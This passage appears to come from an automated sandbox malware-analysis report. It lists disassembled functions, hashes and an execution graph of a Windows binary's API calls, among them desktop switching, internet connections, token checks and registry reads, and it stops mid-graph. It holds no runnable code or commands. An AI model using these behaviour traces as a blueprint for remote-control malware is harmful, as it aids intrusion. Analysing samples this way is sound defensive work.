                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Rect$Text$ClientItemLong
                                                                                    • String ID: 0
                                                                                    • API String ID: 660763476-4108050209
                                                                                    • Opcode ID: 97b201fe1ab446a94319c1091df7dfa4f27efabc15ae0061fbdc0e57a636f286
                                                                                    • Instruction ID: 38b1be1995c3eb4483abf4a6c27e0d8da66832d2f5c6229051dd91ef84e37475
                                                                                    • Opcode Fuzzy Hash: 97b201fe1ab446a94319c1091df7dfa4f27efabc15ae0061fbdc0e57a636f286
                                                                                    • Instruction Fuzzy Hash: 90F0D1B0040248FBDF571F50881ABA93B99AF04766F094025FE5458491C774C998DF64
                                                                                    Function 0015FAC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,0015FD0B,?,?,0015FD80,?,?,?,?,?,0015FD6A), ref: 0015FACD
                                                                                    • GetLastError.KERNEL32(?,?,0015FD80,?,?,?,?,?,0015FD6A), ref: 0015FAD9
                                                                                      • Part of subcall function 00156DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00156DF1
                                                                                    Strings
                                                                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 0015FAE2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                    • API String ID: 1091760877-2248577382
                                                                                    • Opcode ID: 5af7d9888086be5014e45a7b84c90772968daf1255faf497fab4d41050a2cfa1
                                                                                    • Instruction ID: e3fef65039622ce282029d50713a92bfda015c38cd09c22bf0d07eb400d24cfe
                                                                                    • Opcode Fuzzy Hash: 5af7d9888086be5014e45a7b84c90772968daf1255faf497fab4d41050a2cfa1
                                                                                    • Instruction Fuzzy Hash: A2D02B3150843063D54233245C06E6E38145F22371F700714F9356A1E5CB200E8987D1

                                                                                    Execution Graph

                                                                                    Execution Coverage:6.2%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:15%
                                                                                    Total number of Nodes:2000
                                                                                    Total number of Limit Nodes:101
                                                                                    execution_graph 57241 11108d30 57284 1110f420 57241->57284 57244 11108da9 OpenEventA 57247 11108ed1 GetStockObject GetObjectA InitializeCriticalSection InitializeCriticalSection 57244->57247 57248 11108e18 CloseHandle GetSystemDirectoryA 57244->57248 57250 1110f420 std::locale::facet::_Facet_Register 395 API calls 57247->57250 57249 11108e38 57248->57249 57249->57249 57252 11108e40 LoadLibraryA 57249->57252 57251 11108f23 57250->57251 57253 11108f3c 57251->57253 57355 110f4680 398 API calls std::locale::facet::_Facet_Register 57251->57355 57252->57247 57254 11108e71 57252->57254 57312 1110f2b0 57253->57312 57328 111450a0 57254->57328 57258 11108e7b 57260 11108e82 GetProcAddress 57258->57260 57261 11108e9a GetProcAddress 57258->57261 57260->57261 57263 11108ec4 FreeLibrary 57261->57263 57264 11108eb6 57261->57264 57263->57247 57264->57247 57266 11109005 57358 11161d01 57266->57358 57268 1110f420 std::locale::facet::_Facet_Register 395 API calls 57270 11108f73 57268->57270 57269 1110901f 57271 11108f84 57270->57271 57272 11108f8d 57270->57272 57356 110f4680 398 API calls std::locale::facet::_Facet_Register 57271->57356 57274 1110f2b0 539 API calls 57272->57274 57275 11108fa9 CloseHandle 57274->57275 57276 111450a0 std::locale::facet::_Facet_Register 206 API calls 57275->57276 57277 11108fba 57276->57277 57277->57266 57278 1110f420 std::locale::facet::_Facet_Register 395 API calls 57277->57278 57279 11108fc8 57278->57279 57280 11108fe2 57279->57280 57357 110f4680 398 API calls std::locale::facet::_Facet_Register 57279->57357 57282 1110f2b0 539 API calls 57280->57282 57283 11108ffe CloseHandle 57282->57283 57283->57266 57366 11162b51 57284->57366 57287 1110f473 _memset 57291 11161d01 _strupr_s_l_stat 5 API calls 57287->57291 57288 1110f447 wsprintfA 57383 11029450 395 API calls 2 library calls 57288->57383 57292 11108d91 57291->57292 57292->57244 57293 11107290 57292->57293 57392 1110f520 57293->57392 57296 1110f520 3 API calls 57297 111072dc 57296->57297 57298 1110f520 3 API calls 57297->57298 57299 111072ee 57298->57299 57300 1110f520 3 API calls 57299->57300 57301 111072ff 57300->57301 57302 1110f520 3 API calls 57301->57302 57303 11107310 57302->57303 57304 1110f420 std::locale::facet::_Facet_Register 395 API calls 57303->57304 57305 11107321 57304->57305 57306 1110740a 57305->57306 57307 1110732c LoadLibraryA LoadLibraryA 57305->57307 57399 1116219a 67 API calls std::exception::_Copy_str 57306->57399 57307->57244 57309 11107419 57400 111625f1 RaiseException 57309->57400 57311 1110742e 57313 1110f2bf CreateEventA 57312->57313 57314 1110f2d0 CreateThread 57312->57314 57313->57314 57316 1110f2f6 57314->57316 57317 1110f30d 57314->57317 57404 11102c50 57314->57404 57426 1110fde0 57314->57426 57440 11027270 57314->57440 57465 1102c410 57314->57465 57403 11029450 395 API calls 2 library calls 57316->57403 57318 1110f311 WaitForSingleObject CloseHandle 57317->57318 57319 11108f58 CloseHandle 57317->57319 57318->57319 57322 1109e9e0 57319->57322 57323 1109e9ef GetCurrentProcess OpenProcessToken 57322->57323 57324 1109ea2d 57322->57324 57323->57324 57325 1109ea12 57323->57325 57324->57266 57324->57268 57838 1109e910 57325->57838 57327 1109ea1b CloseHandle 57327->57324 57329 111450c1 GetVersionExA 57328->57329 57338 1114529c 57328->57338 57331 111450e3 57329->57331 57329->57338 57330 111452a5 57333 11161d01 _strupr_s_l_stat 5 API calls 57330->57333 57332 111450f0 RegOpenKeyExA 57331->57332 57331->57338 57334 1114511d _memset 57332->57334 57332->57338 57335 111452b2 57333->57335 57851 11143000 RegQueryValueExA 57334->57851 57335->57258 57336 11145304 57337 11161d01 _strupr_s_l_stat 5 API calls 57336->57337 57339 11145314 57337->57339 57338->57330 57338->57336 57858 11081c60 57338->57858 57339->57258 57343 11143000 std::locale::facet::_Facet_Register RegQueryValueExA 57346 11145189 57343->57346 57344 111452ec 57344->57330 57344->57336 57345 1114528f RegCloseKey 57345->57338 57346->57345 57853 11163a2d 57346->57853 57348 111451ad 57349 11163a2d std::locale::facet::_Facet_Register 191 API calls 57348->57349 57351 111451c6 _strncpy 57348->57351 57349->57348 57350 11145271 57350->57345 57351->57350 57352 11143000 std::locale::facet::_Facet_Register RegQueryValueExA 57351->57352 57353 11145248 57352->57353 57354 11143000 std::locale::facet::_Facet_Register RegQueryValueExA 57353->57354 57354->57350 57355->57253 57356->57272 57357->57280 57359 11161d0b IsDebuggerPresent 57358->57359 57360 11161d09 57358->57360 57871 11177637 57359->57871 57360->57269 57363 1116bc99 SetUnhandledExceptionFilter UnhandledExceptionFilter 57364 1116bcbe GetCurrentProcess TerminateProcess 57363->57364 57365 1116bcb6 __call_reportfault 57363->57365 57364->57269 57365->57364 57367 11162bce 57366->57367 57376 11162b5f 57366->57376 57390 1116d4a8 DecodePointer 57367->57390 57369 11162bd4 57391 111692ef 67 API calls __getptd_noexit 57369->57391 57372 11162b8d RtlAllocateHeap 57373 1110f43e 57372->57373 57372->57376 57373->57287 57373->57288 57375 11162b6a 57375->57376 57384 1116d99d 67 API calls __NMSG_WRITE 57375->57384 57385 1116d7ee 67 API calls 6 library calls 57375->57385 57386 1116d52d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 57375->57386 57376->57372 57376->57375 57377 11162bba 57376->57377 57381 11162bb8 57376->57381 57387 1116d4a8 DecodePointer 57376->57387 57388 111692ef 67 API calls __getptd_noexit 57377->57388 57389 111692ef 67 API calls __getptd_noexit 57381->57389 57384->57375 57385->57375 57387->57376 57388->57381 57389->57373 57390->57369 57391->57373 57393 1110f536 CreateEventA 57392->57393 57394 1110f549 57392->57394 57393->57394 57397 1110f557 57394->57397 57401 1110f260 InterlockedIncrement 57394->57401 57396 111072cc 57396->57296 57397->57396 57402 1110f3c0 InterlockedIncrement 57397->57402 57399->57309 57400->57311 57401->57397 57402->57396 57500 11089280 57404->57500 57406 11102c5d 57407 11102c69 GetCurrentThreadId GetThreadDesktop OpenDesktopA 57406->57407 57408 11102ccf GetLastError 57407->57408 57409 11102c8f SetThreadDesktop 57407->57409 57412 11146450 std::locale::facet::_Facet_Register 21 API calls 57408->57412 57410 11102cb1 GetLastError 57409->57410 57411 11102c9a 57409->57411 57414 11146450 std::locale::facet::_Facet_Register 21 API calls 57410->57414 57511 11146450 57411->57511 57415 11102ce1 57412->57415 57417 11102cc3 CloseDesktop 57414->57417 57505 11102bd0 57415->57505 57417->57415 57419 11102ceb 57517 1110f340 57419->57517 57421 11102cf2 57522 110f4740 16 API calls 57421->57522 57423 11102cf9 57523 1110f370 SetEvent PulseEvent 57423->57523 57425 11102d00 std::ios_base::_Tidy 57576 110b7a20 57426->57576 57428 1110fdee GetCurrentThreadId 57429 1110f340 396 API calls 57428->57429 57438 1110fe09 std::ios_base::_Tidy 57429->57438 57431 1110fe20 WaitForSingleObject 57578 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 57431->57578 57432 1110fe8a 57434 1110fe43 57435 1110fe53 PostMessageA 57434->57435 57436 1110fe58 PostThreadMessageA 57434->57436 57435->57438 57436->57438 57437 1110fe80 57580 1110f370 SetEvent PulseEvent 57437->57580 57438->57431 57438->57434 57438->57437 57579 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 57438->57579 57441 110272a2 57440->57441 57442 11089280 5 API calls 57441->57442 57443 110272a9 CreateEventA 57442->57443 57444 1110f420 std::locale::facet::_Facet_Register 395 API calls 57443->57444 57445 110272c6 57444->57445 57446 110272e7 57445->57446 57581 111100d0 57445->57581 57448 1110f340 396 API calls 57446->57448 57461 110272ff 57448->57461 57449 11027316 WaitForMultipleObjects 57450 1102732d 57449->57450 57449->57461 57451 11027336 PostMessageA 57450->57451 57452 1102734a SetEvent Sleep 57450->57452 57451->57452 57451->57461 57452->57461 57453 110273f4 57454 1102740e CloseHandle 57453->57454 57610 1110fc70 408 API calls 2 library calls 57453->57610 57611 1110f370 SetEvent PulseEvent 57454->57611 57455 11027375 PostMessageA 57455->57461 57458 11027423 57460 11027405 std::ios_base::_Tidy 57460->57454 57461->57449 57461->57453 57461->57455 57462 110273ba GetCurrentThreadId GetThreadDesktop 57461->57462 57609 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 57461->57609 57462->57461 57463 110273c9 SetThreadDesktop 57462->57463 57463->57461 57464 110273d4 CloseDesktop 57463->57464 57464->57461 57466 1102c442 57465->57466 57467 1110f340 396 API calls 57466->57467 57468 1102c44f WaitForSingleObject 57467->57468 57469 1102c466 57468->57469 57470 1102c67d 57468->57470 57472 1102c470 GetTickCount 57469->57472 57473 1102c666 WaitForSingleObject 57469->57473 57709 1110f370 SetEvent PulseEvent 57470->57709 57615 110d1550 57472->57615 57473->57469 57473->57470 57474 1102c684 CloseHandle 57710 1110f580 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 57474->57710 57477 110d1550 395 API calls 57490 1102c486 57477->57490 57478 1102c695 std::ios_base::_Tidy 57480 1102c6b4 57711 11029450 395 API calls 2 library calls 57480->57711 57482 1102c6c8 57712 11029450 395 API calls 2 library calls 57482->57712 57484 1102c6dc 57713 11029450 395 API calls 2 library calls 57484->57713 57487 1102c6f0 57714 11029450 395 API calls 2 library calls 57487->57714 57489 1102c574 GetTickCount 57498 1102c571 std::ios_base::_Tidy 57489->57498 57490->57477 57490->57480 57490->57482 57490->57484 57490->57489 57625 110d0710 57490->57625 57637 11029590 LoadLibraryA 57490->57637 57691 110d1370 396 API calls 2 library calls 57490->57691 57492 11146450 std::locale::facet::_Facet_Register 21 API calls 57492->57498 57494 110d07c0 396 API calls 57494->57498 57498->57480 57498->57482 57498->57487 57498->57489 57498->57492 57498->57494 57499 110679c0 411 API calls 57498->57499 57692 11142290 57498->57692 57701 11042530 398 API calls 2 library calls 57498->57701 57702 110d07c0 57498->57702 57499->57498 57524 1110f6c0 57500->57524 57502 11089290 57503 110892b3 57502->57503 57504 110892a2 UnhookWindowsHookEx 57502->57504 57503->57406 57504->57503 57506 1110f420 std::locale::facet::_Facet_Register 395 API calls 57505->57506 57507 11102bfd 57506->57507 57508 11102c30 57507->57508 57530 11102ab0 57507->57530 57508->57419 57510 11102c1d 57510->57419 57512 11146461 57511->57512 57513 1114645c 57511->57513 57550 111458f0 57512->57550 57553 111456a0 18 API calls std::locale::facet::_Facet_Register 57513->57553 57518 1110f360 SetEvent 57517->57518 57519 1110f349 57517->57519 57518->57421 57575 11029450 395 API calls 2 library calls 57519->57575 57522->57423 57523->57425 57525 1110f6d7 EnterCriticalSection 57524->57525 57526 1110f6ce GetCurrentThreadId 57524->57526 57527 1110f6ee ___DllMainCRTStartup 57525->57527 57526->57525 57528 1110f6f5 LeaveCriticalSection 57527->57528 57529 1110f708 LeaveCriticalSection 57527->57529 57528->57502 57529->57502 57537 1115f550 57530->57537 57533 11102b81 CreateWindowExA 57533->57510 57534 11102b17 std::locale::facet::_Facet_Register 57535 11102b50 GetStockObject RegisterClassA 57534->57535 57535->57533 57536 11102b7a 57535->57536 57536->57533 57540 1115e380 GlobalAddAtomA 57537->57540 57541 1115e3b5 GetLastError wsprintfA 57540->57541 57542 1115e407 GlobalAddAtomA GlobalAddAtomA 57540->57542 57549 11029450 395 API calls 2 library calls 57541->57549 57544 11161d01 _strupr_s_l_stat 5 API calls 57542->57544 57545 11102ae1 GlobalAddAtomA 57544->57545 57545->57533 57545->57534 57554 111457a0 57550->57554 57552 11102ca5 CloseDesktop 57552->57415 57553->57512 57555 111457c4 57554->57555 57556 111457c9 57554->57556 57574 111456a0 18 API calls std::locale::facet::_Facet_Register 57555->57574 57557 11145832 57556->57557 57558 111457d2 57556->57558 57560 111458de 57557->57560 57561 1114583f wsprintfA 57557->57561 57562 11145809 57558->57562 57564 111457e0 57558->57564 57565 11161d01 _strupr_s_l_stat 5 API calls 57560->57565 57563 11145862 57561->57563 57568 11161d01 _strupr_s_l_stat 5 API calls 57562->57568 57563->57563 57566 11145869 wvsprintfA 57563->57566 57570 11161d01 _strupr_s_l_stat 5 API calls 57564->57570 57567 111458ea 57565->57567 57573 11145884 57566->57573 57567->57552 57569 1114582e 57568->57569 57569->57552 57571 11145805 57570->57571 57571->57552 57572 111458d1 OutputDebugStringA 57572->57560 57573->57572 57573->57573 57574->57556 57577 110b7a28 std::locale::facet::_Facet_Register 57576->57577 57577->57428 57578->57438 57579->57438 57580->57432 57582 1110f420 std::locale::facet::_Facet_Register 395 API calls 57581->57582 57583 11110101 57582->57583 57584 11110123 GetCurrentThreadId InitializeCriticalSection 57583->57584 57586 1110f420 std::locale::facet::_Facet_Register 395 API calls 57583->57586 57588 11110190 EnterCriticalSection 57584->57588 57589 11110183 InitializeCriticalSection 57584->57589 57587 1111011c 57586->57587 57587->57584 57612 1116219a 67 API calls std::exception::_Copy_str 57587->57612 57590 1111024a LeaveCriticalSection 57588->57590 57591 111101be CreateEventA 57588->57591 57589->57588 57590->57446 57593 111101d1 57591->57593 57594 111101e8 57591->57594 57614 11029450 395 API calls 2 library calls 57593->57614 57597 1110f420 std::locale::facet::_Facet_Register 395 API calls 57594->57597 57595 1111013f 57613 111625f1 RaiseException 57595->57613 57598 111101ef 57597->57598 57601 1111020c 57598->57601 57602 111100d0 533 API calls 57598->57602 57603 1110f420 std::locale::facet::_Facet_Register 395 API calls 57601->57603 57602->57601 57604 1111021c 57603->57604 57605 1111022d 57604->57605 57606 1110f520 3 API calls 57604->57606 57607 1110f2b0 533 API calls 57605->57607 57606->57605 57608 11110245 57607->57608 57608->57590 57609->57461 57610->57460 57611->57458 57612->57595 57613->57584 57715 110d1480 57615->57715 57618 110d159b 57620 110d15b5 57618->57620 57621 110d1598 57618->57621 57619 110d1584 57729 11029450 395 API calls 2 library calls 57619->57729 57620->57490 57621->57618 57730 11029450 395 API calls 2 library calls 57621->57730 57626 110d0724 57625->57626 57770 11163cf8 57626->57770 57633 110d077c 57633->57490 57634 110d0765 57795 11029450 395 API calls 2 library calls 57634->57795 57662 11029621 std::ios_base::_Tidy 57637->57662 57638 11029653 GetProcAddress 57639 11029671 SetLastError 57638->57639 57638->57662 57639->57662 57640 11162b51 _malloc 67 API calls 57640->57662 57641 11029748 InternetOpenA 57643 11029784 _free 57641->57643 57642 1102972f GetProcAddress 57642->57641 57644 11029779 SetLastError 57642->57644 57643->57662 57644->57643 57645 110296a5 GetProcAddress 57646 11029762 SetLastError 57645->57646 57645->57662 57648 110296d2 GetLastError 57646->57648 57647 11142290 std::locale::facet::_Facet_Register 395 API calls 57647->57662 57649 110296dd _free 57648->57649 57648->57662 57650 11162b51 _malloc 67 API calls 57649->57650 57650->57662 57651 110296f5 GetProcAddress 57653 1102976f SetLastError 57651->57653 57651->57662 57652 11029a40 57657 11029b76 GetProcAddress 57652->57657 57658 11029a31 57652->57658 57653->57662 57654 11029bb0 57654->57498 57655 11029ba9 FreeLibrary 57655->57654 57656 11029a1a std::ios_base::_Tidy 57656->57652 57656->57658 57659 11029a57 GetProcAddress 57656->57659 57663 11029b36 std::ios_base::_Tidy 57656->57663 57665 11029a88 std::ios_base::_Tidy 57656->57665 57657->57658 57661 11029b97 SetLastError 57657->57661 57658->57654 57658->57655 57659->57656 57660 11029b2e SetLastError 57659->57660 57660->57663 57661->57658 57662->57638 57662->57640 57662->57641 57662->57642 57662->57645 57662->57647 57662->57648 57662->57651 57662->57656 57664 11081a70 IsDBCSLeadByte 57662->57664 57670 110297ff GetProcAddress 57662->57670 57671 1102982b GetProcAddress 57662->57671 57672 1102983e InternetConnectA 57662->57672 57677 110298a3 GetProcAddress 57662->57677 57678 11029864 GetProcAddress 57662->57678 57682 110298f1 GetProcAddress 57662->57682 57684 11029922 GetLastError 57662->57684 57687 11029975 GetLastError 57662->57687 57688 1102998c GetDesktopWindow 57662->57688 57829 110278a0 GetProcAddress SetLastError 57663->57829 57664->57662 57665->57656 57665->57663 57681 110d1090 395 API calls 57665->57681 57821 1110f4a0 57665->57821 57828 11027850 GetProcAddress SetLastError 57665->57828 57668 11029b5b 57830 110278a0 GetProcAddress SetLastError 57668->57830 57670->57662 57674 1102981c SetLastError 57670->57674 57671->57672 57676 11029881 SetLastError 57671->57676 57672->57662 57673 11029b6a 57673->57652 57674->57662 57676->57662 57677->57662 57679 110298d6 SetLastError 57677->57679 57678->57662 57680 11029891 SetLastError 57678->57680 57679->57662 57680->57662 57681->57665 57682->57662 57683 11029918 SetLastError 57682->57683 57683->57684 57684->57662 57685 1102993d GetProcAddress 57684->57685 57685->57662 57686 1102996d SetLastError 57685->57686 57686->57687 57687->57662 57687->57688 57688->57662 57689 1102999a GetProcAddress 57688->57689 57689->57662 57690 110299d6 SetLastError 57689->57690 57690->57662 57691->57490 57693 1114229a 57692->57693 57694 1114229c 57692->57694 57693->57498 57695 1110f4a0 std::locale::facet::_Facet_Register 395 API calls 57694->57695 57696 111422c2 57695->57696 57697 111422cb _strncpy 57696->57697 57698 111422e9 57696->57698 57697->57498 57832 11029450 395 API calls 2 library calls 57698->57832 57701->57498 57833 110d05c0 57702->57833 57705 110d07e9 _free 57705->57473 57706 110d07d2 57837 11029450 395 API calls 2 library calls 57706->57837 57709->57474 57710->57478 57716 110d148c 57715->57716 57717 110d14a7 57716->57717 57718 110d1490 57716->57718 57731 110d0190 57717->57731 57760 11029450 395 API calls 2 library calls 57718->57760 57725 110d14de 57725->57618 57725->57619 57726 110d14c7 57761 11029450 395 API calls 2 library calls 57726->57761 57732 110d0199 57731->57732 57733 110d019d 57732->57733 57734 110d01b4 57732->57734 57762 11029450 395 API calls 2 library calls 57733->57762 57736 110d01b1 57734->57736 57737 110d01e8 57734->57737 57736->57734 57763 11029450 395 API calls 2 library calls 57736->57763 57739 110d01e5 57737->57739 57740 110d0206 57737->57740 57739->57737 57764 11029450 395 API calls 2 library calls 57739->57764 57743 110d1090 57740->57743 57744 110d109e 57743->57744 57745 110d10a2 57744->57745 57747 110d10b9 57744->57747 57765 11029450 395 API calls 2 library calls 57745->57765 57749 110d10b6 57747->57749 57750 110d10ec 57747->57750 57748 110d1160 57748->57725 57748->57726 57749->57747 57766 11029450 395 API calls 2 library calls 57749->57766 57750->57748 57750->57750 57767 110d09e0 395 API calls std::locale::facet::_Facet_Register 57750->57767 57753 110d1113 57756 110d111f _memmove 57753->57756 57768 110d0920 395 API calls std::locale::facet::_Facet_Register 57753->57768 57756->57748 57757 110d1149 57756->57757 57769 11029450 395 API calls 2 library calls 57757->57769 57767->57753 57768->57756 57771 11163d09 _strlen 57770->57771 57775 110d072f 57770->57775 57772 11162b51 _malloc 67 API calls 57771->57772 57773 11163d1c 57772->57773 57773->57775 57796 1116be9f 57773->57796 57778 110d0450 57775->57778 57779 110d045b 57778->57779 57780 110d0472 57778->57780 57817 11029450 395 API calls 2 library calls 57779->57817 57783 110cfe70 57780->57783 57784 110cfe7d 57783->57784 57785 110cfe98 57784->57785 57786 110cfe81 57784->57786 57788 110cfe95 57785->57788 57789 110cfeb6 57785->57789 57818 11029450 395 API calls 2 library calls 57786->57818 57788->57785 57819 11029450 395 API calls 2 library calls 57788->57819 57791 110cfeb3 57789->57791 57794 110cfed9 57789->57794 57791->57789 57820 11029450 395 API calls 2 library calls 57791->57820 57794->57633 57794->57634 57797 1116beb4 57796->57797 57798 1116bead 57796->57798 57808 111692ef 67 API calls __getptd_noexit 57797->57808 57798->57797 57800 1116bed2 57798->57800 57802 11163d2e 57800->57802 57810 111692ef 67 API calls __getptd_noexit 57800->57810 57802->57775 57805 1116deb2 57802->57805 57804 1116beb9 57809 1116df04 11 API calls _strupr_s_l_stat 57804->57809 57811 1116dd89 57805->57811 57808->57804 57809->57802 57810->57804 57812 1116dda8 _memset __call_reportfault 57811->57812 57813 1116ddc6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 57812->57813 57814 1116de94 __call_reportfault 57813->57814 57815 11161d01 _strupr_s_l_stat 5 API calls 57814->57815 57816 1116deb0 GetCurrentProcess TerminateProcess 57815->57816 57816->57775 57822 11162b51 _malloc 67 API calls 57821->57822 57823 1110f4ae 57822->57823 57824 1110f4b7 57823->57824 57825 1110f4ce _memset 57823->57825 57831 11029450 395 API calls 2 library calls 57824->57831 57825->57665 57828->57665 57829->57668 57830->57673 57834 110d05d9 57833->57834 57836 110d05ec 57833->57836 57835 110d0450 395 API calls 57834->57835 57834->57836 57835->57836 57836->57705 57836->57706 57839 1109e930 GetTokenInformation 57838->57839 57844 1109e9c6 57838->57844 57841 1109e952 _strupr_s_l_stat 57839->57841 57840 11161d01 _strupr_s_l_stat 5 API calls 57842 1109e9d8 57840->57842 57843 1109e958 GetTokenInformation 57841->57843 57841->57844 57842->57327 57843->57844 57845 1109e96a 57843->57845 57844->57840 57846 1109e99f EqualSid 57845->57846 57847 1109e973 AllocateAndInitializeSid 57845->57847 57846->57844 57848 1109e9ad 57846->57848 57847->57844 57847->57846 57849 11161d01 _strupr_s_l_stat 5 API calls 57848->57849 57850 1109e9c2 57849->57850 57850->57327 57852 1114302a 57851->57852 57852->57343 57854 11163a4d 57853->57854 57855 11163a3b 57853->57855 57868 111639dc 191 API calls _LocaleUpdate::_LocaleUpdate 57854->57868 57855->57348 57857 11163a57 57857->57348 57859 11081c6d 57858->57859 57860 11081c72 57858->57860 57869 11081990 IsDBCSLeadByte 57859->57869 57862 11081c7b 57860->57862 57866 11081c93 57860->57866 57870 11163784 193 API calls 2 library calls 57862->57870 57864 11081c8c 57864->57344 57865 11081c99 57865->57344 57866->57865 57867 11165797 197 API calls std::locale::facet::_Facet_Register 57866->57867 57867->57866 57868->57857 57869->57860 57870->57864 57871->57363 57872 11115b70 57890 11145320 57872->57890 57875 11115bb5 57876 11115bc4 CoInitialize CoCreateInstance 57875->57876 57877 11115b98 57875->57877 57879 11115bf4 LoadLibraryA 57876->57879 57882 11115be9 57876->57882 57880 11161d01 _strupr_s_l_stat 5 API calls 57877->57880 57878 111450a0 std::locale::facet::_Facet_Register 206 API calls 57878->57875 57881 11115c10 GetProcAddress 57879->57881 57879->57882 57883 11115ba6 57880->57883 57884 11115c20 SHGetSettings 57881->57884 57885 11115c34 FreeLibrary 57881->57885 57886 11115cd1 CoUninitialize 57882->57886 57887 11115cd7 57882->57887 57884->57885 57885->57882 57886->57887 57888 11161d01 _strupr_s_l_stat 5 API calls 57887->57888 57889 11115ce6 57888->57889 57891 111450a0 std::locale::facet::_Facet_Register 206 API calls 57890->57891 57892 11115b8e 57891->57892 57892->57875 57892->57877 57892->57878 57893 11173a35 57916 1116b7b5 57893->57916 57895 11173a52 _LcidFromHexString 57896 11173a5f GetLocaleInfoA 57895->57896 57897 11173a86 57896->57897 57898 11173a92 57896->57898 57900 11161d01 _strupr_s_l_stat 5 API calls 57897->57900 57921 111646ce 192 API calls 2 library calls 57898->57921 57902 11173c02 57900->57902 57901 11173a9e 57903 11173aa8 GetLocaleInfoA 57901->57903 57914 11173ad8 _LangCountryEnumProc@4 _strlen 57901->57914 57903->57897 57904 11173ac7 57903->57904 57922 111646ce 192 API calls 2 library calls 57904->57922 57905 11173b4b GetLocaleInfoA 57905->57897 57907 11173b6e 57905->57907 57924 111646ce 192 API calls 2 library calls 57907->57924 57909 11173ad2 57909->57914 57923 11163784 193 API calls 2 library calls 57909->57923 57910 11173b79 57910->57897 57913 11173b81 _strlen 57910->57913 57925 111646ce 192 API calls 2 library calls 57910->57925 57913->57897 57926 111739da GetLocaleInfoW _GetPrimaryLen _strlen 57913->57926 57914->57897 57914->57905 57927 1116b73c GetLastError 57916->57927 57918 1116b7bd 57919 1116b7ca 57918->57919 57939 1116d7aa 67 API calls 3 library calls 57918->57939 57919->57895 57921->57901 57922->57909 57923->57914 57924->57910 57925->57913 57926->57897 57940 1116b5fa TlsGetValue 57927->57940 57930 1116b7a9 SetLastError 57930->57918 57933 1116b76f DecodePointer 57934 1116b784 57933->57934 57935 1116b7a0 _free 57934->57935 57936 1116b788 57934->57936 57935->57930 57949 1116b688 67 API calls 4 library calls 57936->57949 57938 1116b790 GetCurrentThreadId 57938->57930 57941 1116b60f DecodePointer TlsSetValue 57940->57941 57942 1116b62a 57940->57942 57941->57942 57942->57930 57943 11169dbe 57942->57943 57945 11169dc7 57943->57945 57946 11169e04 57945->57946 57947 11169de5 Sleep 57945->57947 57950 11170166 57945->57950 57946->57930 57946->57933 57948 11169dfa 57947->57948 57948->57945 57948->57946 57949->57938 57951 11170172 57950->57951 57953 1117018d 57950->57953 57952 1117017e 57951->57952 57951->57953 57959 111692ef 67 API calls __getptd_noexit 57952->57959 57954 111701a0 RtlAllocateHeap 57953->57954 57956 111701c7 57953->57956 57960 1116d4a8 DecodePointer 57953->57960 57954->57953 57954->57956 57956->57945 57957 11170183 57957->57945 57959->57957 57960->57953 57961 1102e640 57962 1102e683 57961->57962 57963 1110f420 std::locale::facet::_Facet_Register 395 API calls 57962->57963 57964 1102e68a 57963->57964 58343 11142bb0 57964->58343 57967 1102e701 57970 11142bb0 197 API calls 57967->57970 57969 1102e6e6 57971 11081bb0 200 API calls 57969->57971 57975 1102e72a 57970->57975 57971->57967 57972 1102e766 57973 1102e7e5 CreateEventA 57972->57973 57974 1102e7bf GetSystemMetrics 57972->57974 57981 1102e805 57973->57981 57982 1102e819 57973->57982 57974->57973 57976 1102e7ce 57974->57976 57975->57972 57979 111450a0 std::locale::facet::_Facet_Register 206 API calls 57975->57979 57977 11146450 std::locale::facet::_Facet_Register 21 API calls 57976->57977 57980 1102e7d8 57977->57980 57979->57972 58949 1102d330 57980->58949 59090 11029450 395 API calls 2 library calls 57981->59090 57985 1110f420 std::locale::facet::_Facet_Register 395 API calls 57982->57985 57986 1102e820 57985->57986 57987 1102e840 57986->57987 57988 111100d0 539 API calls 57986->57988 57989 1110f420 std::locale::facet::_Facet_Register 395 API calls 57987->57989 57988->57987 57990 1102e854 57989->57990 57991 111100d0 539 API calls 57990->57991 57992 1102e874 57990->57992 57991->57992 57993 1110f420 std::locale::facet::_Facet_Register 395 API calls 57992->57993 57994 1102e8f3 57993->57994 57995 1110f420 std::locale::facet::_Facet_Register 395 API calls 57994->57995 57999 1102e93d 57995->57999 57996 1102e966 FindWindowA 57997 1102eab7 57996->57997 57998 1102e99b 57996->57998 58347 110613d0 57997->58347 57998->57997 58002 1102e9b3 GetWindowThreadProcessId 57998->58002 57999->57996 58004 11146450 std::locale::facet::_Facet_Register 21 API calls 58002->58004 58003 110613d0 397 API calls 58005 1102ead5 58003->58005 58006 1102e9d9 